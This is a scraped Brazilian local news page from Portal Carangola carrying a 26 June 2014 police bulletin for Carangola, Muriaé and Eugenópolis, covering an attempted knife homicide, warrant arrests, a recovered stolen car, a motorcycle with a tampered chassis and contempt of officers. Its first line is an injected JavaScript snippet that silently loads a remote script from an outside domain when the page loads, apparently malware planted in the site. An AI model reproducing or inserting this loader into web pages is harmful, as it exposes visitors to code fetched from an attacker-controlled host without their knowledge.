;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ocorrências Policiais em destaque Carangola e Região - 26/06/2014 - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Ocorrências Policiais em destaque Carangola e Região – 26/06/2014

pmbn

OCORRÊNCIAS DE DESTAQUE  MURIAÉ – 26/06/2014

                         75ª CIA PM- CARANGOLA-MG

 HOMICÍDIO TENTADO EM CARANGOLA – MG.

            Em 26/06/2014, por volta de 00:30h, na praça presidente getúlio vargas, triângulo, militares depararam com um indivíduo cambaleando pela via e sendo seguido por outro, o qual empunhava uma faca, sendo efetuada a abordagem momento que o indivíduo que cambaleava, identificado por W.A.S., de 24 anos, caiu ao solo desmaiado, e apresentava um ferimento na barriga. O outro indivíduo, L.A., de 28 anos, soltou a faca, confessando que acabara de desferir um golpe ao jovem. O autor relatou que ele deu R$50,00 à vítima para que comprasse crack e a mesma teria comprado e consumido a droga sozinho, motivo pelo qual entraram em atrito. Após levar o primeiro golpe, a vítima tentou fugir do local, momento que o autor a perseguiu no intuito de desferir outras facadas e ainda disse que degolaria a vítima. Contudo, deparou com a PM e foi impedido de concretizar o ato. Ainda acrescentou: “eu quero matá-lo, mas vocês me impediram, ele me ameaçou e eu estou com medo dele, por isso prefiro matá-lo”. A faca utilizada no crime foi recolhida. A vítima foi socorrida ao pronto socorro, sendo encaminhada ao centro cirúrgico. Foi constatada perfuração interna na aponeurose. Foi dado voz de prisão ao autor e conduzido à Delegacia de Polícia.

 CUMPRIMENTO DE MANDADO DE PRISÃO EM CARANGOLA – MG

            Em 25/06/2014, por volta de 11:20h, na Rua Abilio Ramalho, bairro Santo Onofre, foi dado cumprimento ao mandado de prisão em desfavor de V.P., de 30 anos, e conduzido à Delegacia de Policia de Carangola.

                        76ª CIA PM – MURIAÉ

 CUMPRIMENTO DE MANDADO DE PRISÃO EM MURIAÉ-MG

            Em 25/06/2014, por volta de 18:02h, na praça coronel tiburcio, barra, acionados militares abordaram C.R.C.P., de 58 anos, da cidade de Rosário da Limeira -MG, sendo constatado em seu desfavor um mandado de prisão em aberto, o qual foi cumprido. A vítima foi conduzida à Delegacia de Policia de Muriaé-MG.

 VEÍCULO PRODUTO DE FURTO É RECUPERADO EM MURIAÉ-MG

            Em 26/06/2014, por volta de 01:25h, na travessa Manoel Pena, barra, acionados Militares fizeram contato com a W.R., de 62 anos, e este relatou que deixou seu veículo GM/CHEVETTE, em frente sua casa e posteriormente foi informado que o carro teria sido furtado. Em rastreamento, o veículo foi localizado estacionado pela rua LICA MUGLIA, bairro AEROPORTO. Veículo foi removido ao pátio credenciado Detran.

 PM ABORDA MOTOCICLETA COM CHASSI RASPADO EM MURIAÉ-MG

            Em patrulhamento, militares abordaram o veículo motocicleta SUZUKI, cor prata, conduzida por J.P.P., de 22 ANOS. Que o veículo estava com o arame de selagem partido e com o número do chassi rebatido. Em consulta no sistema, foi constatado que a placa do veículo pertence a uma motocicleta HONDA CG TITAN 150 ESD, cor preta, furtada na cidade de GUIRICEMA/MG, em 14/01/2014 e recuperada sem a placa na cidade de Muriaé – MG em 11/03/2014. O condutor esclareceu que a motocicleta pertence ao seu sogro, de pré nome A.D., que reside na zona rural do município de GUIRICEMA/MG. O condutor foi conduzido à Delegacia de Polícia de Muriaé e o veículo removido ao pátio credenciado Detran.

 DESACATO EM EUGENÓPOLIS – MG

            Em 25/06/2014, por volta de 8:40h, na Rua Piauí, Nossa Senhora de Lourdes, Militares compareceram no local onde estava ocorrendo uma agressão entre marido e mulher e em contato com P.B.G.S., de 26 anos, este disse que não conversaria com policiais, que o problema era com sua amásia, dizendo palavras de desacato aos policiais em suma: “porque vocês não vão procurar um serviço(…), vão prender esses bandidos, porque eu não sou bandido”. Logo em seguida, o autor se trancou no banheiro, sendo necessário arrombar a porta e fazer uso de força física moderada. Foi dado voz de prisão ao autor e durante sua condução à Delegacia de Polícia de Muriaé, o mesmo ameaçou os militares dizendo que daria tiros, e ainda chutou o armário da Delegacia.

ASSESSORIA DE COMUNICAÇÃO ORGANIZACIONAL DO 47° BPM

RUA JOSÉ DE FREITAS LIMA Nº 47 – BAIRRO SAFIRA

MURIAÉ / MG

TELEFONE: 3696-3275. 3696-3265

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.